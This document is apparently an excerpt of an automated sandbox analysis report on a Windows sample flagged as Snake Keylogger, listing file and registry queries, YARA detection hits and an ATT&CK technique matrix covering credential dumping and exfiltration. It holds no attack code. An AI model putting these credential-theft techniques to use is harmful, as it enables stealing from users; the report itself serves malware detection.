Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Users\user\Desktop\VQsnGWaNi5.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Queries volume information: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Queries volume information: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation

Source: C:\Users\user\Desktop\VQsnGWaNi5.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 9.2.ywKvCTGbQjXP.exe.420f4e0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VQsnGWaNi5.exe.3b4e980.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VQsnGWaNi5.exe.3b6eda0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.VQsnGWaNi5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.ywKvCTGbQjXP.exe.422f900.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.ywKvCTGbQjXP.exe.422f900.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.ywKvCTGbQjXP.exe.420f4e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VQsnGWaNi5.exe.3b6eda0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VQsnGWaNi5.exe.3b4e980.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.1884137452.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1863654671.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1777946348.000000000420F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1884137452.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1866290229.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1729092792.0000000003B4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VQsnGWaNi5.exe PID: 6532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: VQsnGWaNi5.exe PID: 7284, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ywKvCTGbQjXP.exe PID: 7384, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ywKvCTGbQjXP.exe PID: 7676, type: MEMORYSTR

Source: Yara match	File source: 9.2.ywKvCTGbQjXP.exe.420f4e0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VQsnGWaNi5.exe.3b4e980.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VQsnGWaNi5.exe.3b6eda0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.VQsnGWaNi5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.ywKvCTGbQjXP.exe.422f900.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.ywKvCTGbQjXP.exe.422f900.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.ywKvCTGbQjXP.exe.420f4e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VQsnGWaNi5.exe.3b6eda0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VQsnGWaNi5.exe.3b4e980.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1863654671.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1777946348.000000000420F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1729092792.0000000003B4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VQsnGWaNi5.exe PID: 6532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: VQsnGWaNi5.exe PID: 7284, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ywKvCTGbQjXP.exe PID: 7384, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 9.2.ywKvCTGbQjXP.exe.420f4e0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VQsnGWaNi5.exe.3b4e980.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VQsnGWaNi5.exe.3b6eda0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.VQsnGWaNi5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.ywKvCTGbQjXP.exe.422f900.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.ywKvCTGbQjXP.exe.422f900.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.ywKvCTGbQjXP.exe.420f4e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VQsnGWaNi5.exe.3b6eda0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VQsnGWaNi5.exe.3b4e980.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.1884137452.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1863654671.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1777946348.000000000420F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1884137452.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1866290229.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1729092792.0000000003B4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VQsnGWaNi5.exe PID: 6532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: VQsnGWaNi5.exe PID: 7284, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ywKvCTGbQjXP.exe PID: 7384, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ywKvCTGbQjXP.exe PID: 7676, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Masquerading	OS Credential Dumping	1 Query Registry	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	11 Disable or Modify Tools	LSASS Memory	11 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
